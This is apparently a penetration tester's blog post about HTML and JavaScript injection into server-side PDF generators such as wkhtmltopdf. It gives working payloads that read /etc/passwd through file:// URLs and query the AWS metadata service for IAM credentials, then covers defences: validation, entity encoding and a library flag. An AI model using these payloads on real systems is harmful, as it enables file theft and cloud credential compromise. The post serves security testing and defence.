Breaking PDFs with Server-Side Shenanigans

Introduction

Generating PDFs from user-supplied content is very common functionality in modern web applications, whether that is producing a receipt for an online purchase or generating a report from data the application has collected from its users. The applications for this functionality are endless.

Because dynamic PDF generation is useful in so many places, there are many third-party libraries (some open source) that let developers generate a PDF from user-supplied content.

The following sections break down the attack surface that may be exposed once such functionality is implemented in a web application: how to identify vulnerabilities, some known attacks, and how to mitigate this type of issue.

Background

Many third-party libraries exist to perform PDF generation. Many of them take in HTML and CSS and use it to structure the layout of the final PDF.

Popular Third-Party Libraries

  • PDFKit – JavaScript
  • iText – Java
  • Wkhtmltopdf – C++
  • FPDF – PHP
  • IronPDF – .NET

Simple checks can identify which library, and sometimes which version of it, is in use. The ‘Document Properties’ of a PDF will often leak the “PDF Producer” in the document metadata.

The example below shows the document properties of an invoice generated by Amazon for a recent online purchase. As highlighted in the figure, the “PDF Producer” field reveals which library is in use as well as its specific version:

The Document Properties will often also give a clear indication of whether the PDF was generated client-side or server-side. It is safe to assume that the PDF in the screenshot above was generated server-side using iText 2.0.8.
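The same check can be scripted. The following is a minimal sketch, assuming the producer is stored either as an uncompressed literal string in the Info dictionary or in XMP metadata; PDFs that keep this data in compressed object streams or encode it as UTF-16 would need a proper PDF parser. The function name `find_pdf_producer` is hypothetical.

```python
import re
from typing import Optional

# Info-dictionary form, e.g. "/Producer (ExampleLib 1.2.3)". The pattern
# tolerates escaped characters and one level of nested parentheses.
PRODUCER_LITERAL = re.compile(rb"/Producer\s*\(((?:[^()\\]|\\.|\([^()]*\))*)\)")

# XMP metadata form, e.g. "<pdf:Producer>ExampleLib 1.2.3</pdf:Producer>".
PRODUCER_XMP = re.compile(rb"<pdf:Producer>(.*?)</pdf:Producer>", re.DOTALL)


def find_pdf_producer(pdf_bytes: bytes) -> Optional[str]:
    """Return the first producer string found in the raw PDF bytes, if any."""
    for pattern in (PRODUCER_LITERAL, PRODUCER_XMP):
        match = pattern.search(pdf_bytes)
        if match:
            return match.group(1).decode("latin-1").strip()
    return None
```

Reading a downloaded file with `open(path, "rb").read()` and passing the bytes to `find_pdf_producer` is enough to triage a batch of generated documents.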

Basic Discovery

The first check is to identify a vulnerable input by injecting some additional HTML elements into the page and observing how the application handles them. Adding some <h1> tags to your input will suffice and will make it obvious when a potentially vulnerable input has been found.
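To see why this probe works, consider a minimal sketch of the kind of server-side template that produces the behaviour. The function name `build_invoice_html` and the `address` parameter are hypothetical; the only point is that user input is concatenated into the markup handed to the PDF renderer without any encoding.

```python
def build_invoice_html(address: str) -> str:
    """Hypothetical, deliberately vulnerable template: input is inserted as-is."""
    return f"<html><body><p>Deliver to: {address}</p></body></html>"


# A harmless probe: if the PDF shows "pdf-probe" as a large heading rather
# than printing the literal tags, the renderer is interpreting injected HTML.
probe = "<h1>pdf-probe</h1>"
print(build_invoice_html(probe))
```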

In performing this check, the tester will be able to confirm two things:

  • The application does not correctly sanitise user-input.
  • The application does not encode “malicious” characters.

The result:

Exploit

Now that we’ve confirmed it is possible to inject additional HTML, how can this vulnerability be exploited further? How does the application handle ‘<script>’ or ‘<img>’ tags?

Use any of the following scripts to test whether JavaScript is executed. Note that, depending on implementation and configuration, <script> tags may be disabled, in which case it is worth being more creative and using other HTML elements.

Basic Discovery Scripts

  • <img src="x" onerror="document.write(document.location.href)" />
  • <script>document.write(JSON.stringify(window.location))</script>
  • <svg/onload=document.write(document.location.href)>

The result:

Instead of simply rendering the code as text, the PDF generator runs the script server-side, allowing us to write the value of ‘document.location.href’ to the page.

Once you have confirmed that it is possible to inject HTML and JavaScript into the document for the server to run, what else is achievable?

Local File Inclusion

“The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.” – OWASP https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

It is possible to leverage this vulnerability to include a local file on the server and render the contents of the file into the PDF document.

Consider using one of the following scripts:
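A minimal sketch of two such payloads, written as Python helpers that build the HTML to submit. It assumes the renderer executes JavaScript (for the first variant) and allows requests to file:// URLs; both function names are hypothetical and not part of any library.

```python
def build_file_read_payload(path: str) -> str:
    """XHR variant: fetch a local file and write its contents into the page."""
    url = "file://" + path
    return (
        "<script>"
        "var x = new XMLHttpRequest();"
        "x.onload = function () { document.write(this.responseText); };"
        f'x.open("GET", "{url}");'
        "x.send();"
        "</script>"
    )


def build_iframe_payload(path: str) -> str:
    """Script-free variant: embed the local file in an iframe."""
    return f'<iframe src="file://{path}" width="800" height="600"></iframe>'


print(build_file_read_payload("/etc/passwd"))
print(build_iframe_payload("/etc/passwd"))
```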

The result:

In this example the contents of the /etc/passwd file are displayed. However, depending on the library and its implementation, it may be possible to read any file, such as SSH keys to gain unauthorised access to the system, or configuration files containing plain-text passwords to elevate privileges on the application.

Server-Side Request Forgery

“In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.” – OWASP https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

As the previous attack confirmed that it is possible to create and send XMLHttpRequests inside <script> tags, we can attempt to abuse this functionality to identify any internal services that are running.

If a web server is hosted within an AWS environment, a malicious user may be able to extract important configuration, and sometimes even authentication keys, by accessing the internal REST interface located at http://169.254.169.254/latest/meta-data. By default, the AWS EC2 metadata service is only accessible from the specific EC2 instance it is associated with and should never be exposed externally. With this vulnerability, however, the requests come from the server itself and the responses are rendered into the PDF, allowing us to access the service.

Useful AWS endpoints to query
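The sketch below lists a few commonly queried metadata paths and wraps each in an XMLHttpRequest payload. The helper name `build_fetch_payload` is hypothetical. Plain GET requests like these are only answered when version 1 of the metadata service (IMDSv1) is enabled; IMDSv2 requires a session token obtained with a PUT request first, and whether the renderer permits the request at all depends on its configuration.

```python
# Link-local address of the EC2 instance metadata service.
METADATA_BASE = "http://169.254.169.254/latest"

# Commonly queried paths; what is available depends on the instance setup.
METADATA_PATHS = [
    "/meta-data/",                           # index of available metadata keys
    "/meta-data/hostname",                   # internal hostname of the instance
    "/meta-data/iam/security-credentials/",  # name of any attached IAM role
    "/user-data",                            # start-up data, may hold secrets
    "/dynamic/instance-identity/document",   # account ID, region, instance ID
]


def build_fetch_payload(url: str) -> str:
    """Return an HTML snippet that writes the response body of `url` to the page."""
    return (
        "<script>"
        "var x = new XMLHttpRequest();"
        "x.onload = function () { document.write(this.responseText); };"
        f'x.open("GET", "{url}");'
        "x.send();"
        "</script>"
    )


payloads = [build_fetch_payload(METADATA_BASE + path) for path in METADATA_PATHS]
```

Appending a role name returned by the security-credentials path to that same path is what yields the temporary access keys for the role.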

Prevention/Conclusion

Though very serious when exploited fully, the issue is in most scenarios relatively easy to fix or prevent. Having walked through some basic discovery methods and some sample attacks, it is possible to identify two weaknesses in the POC above:

  • Input Validation
  • Output Encoding

The application makes no effort to validate any of the input received from a user. In the scenario above it is possible to insert HTML and JavaScript code into the address field of our form. The application is therefore neither checking that a valid address has been supplied nor validating that the input is only text before sending it to the web server.
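Server-side validation of the address field could be sketched as follows. The permitted character set and the 200-character limit are assumptions chosen for illustration; a real application would need to widen the set for international addresses.

```python
import re

# Assumed allow-list: letters, digits, spaces and a little punctuation.
ADDRESS_ALLOW_LIST = re.compile(r"[A-Za-z0-9 ,.'/\-]{1,200}")


def is_valid_address(value: str) -> bool:
    """Accept the value only if every character is on the allow-list."""
    return ADDRESS_ALLOW_LIST.fullmatch(value) is not None
```

Using `fullmatch` rather than `match` means the whole string must conform, so a payload cannot hide behind a valid-looking prefix.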

Additionally, the application made no effort to encode any of the data supplied by a user. By default, HTML-based PDF generators render HTML entities correctly, so an extra measure to ensure that a payload is rendered as text rather than executed (should a user bypass the input validation) is to convert ‘dangerous’ characters to their associated HTML entities.

Character    HTML Character Entity
&            &amp;
<            &lt;
>            &gt;
"            &quot;
'            &#x27;
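In Python, the standard library already performs this conversion. The sketch below assumes a hypothetical template function `build_invoice_html`; `html.escape` with `quote=True` encodes all five characters in the table, emitting `&#x27;` for the apostrophe.

```python
import html


def encode_for_pdf_template(value: str) -> str:
    """Convert &, <, >, double and single quotes to HTML entities."""
    return html.escape(value, quote=True)


def build_invoice_html(address: str) -> str:
    """Hypothetical template that encodes user input before rendering."""
    return f"<p>Deliver to: {encode_for_pdf_template(address)}</p>"
```

With this in place, an injected `<script>` tag reaches the PDF renderer as `&lt;script&gt;` and is printed as text instead of being executed.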

It is also worth checking the PDF generator library’s developer documentation for any additional optional security controls that could protect the application from further exploitation. In this example the application uses the Wkhtmltopdf library to generate PDFs, and its documentation shows that the local file inclusion vulnerability could be prevented by rendering PDFs with the ‘--disable-local-file-access’ flag, which prevents the tool from accessing local files.
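A minimal sketch of invoking the tool with that flag from Python, assuming the `wkhtmltopdf` binary is on the PATH. The helper names are hypothetical, and `--disable-javascript` is an additional hardening option not discussed above; it is only suitable when the generated documents do not rely on scripts.

```python
import subprocess
from typing import List


def build_wkhtmltopdf_command(input_html: str, output_pdf: str) -> List[str]:
    """Build an argument list; no shell is involved, so no shell injection."""
    return [
        "wkhtmltopdf",
        "--disable-local-file-access",  # block file:// reads from the page
        "--disable-javascript",         # assumption: documents need no scripts
        input_html,
        output_pdf,
    ]


def render_pdf(input_html: str, output_pdf: str) -> None:
    """Run the renderer and raise if it fails or hangs."""
    command = build_wkhtmltopdf_command(input_html, output_pdf)
    subprocess.run(command, check=True, timeout=30)
```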

In conclusion, there is nothing new about this vulnerability, yet it is not uncommon to find issues of this type during a web application assessment. Though ‘simple’ to resolve, this type of vulnerability is easy to overlook, especially if a developer is unaware of the potential issues surrounding the functionality. The golden rule still applies: a developer should never implicitly trust user-supplied content and should always check the supplied input against an allow-list of approved characters to ensure that only text is submitted to the application.

This blog post was written by Jeremy Griffin of Prism Infosec.
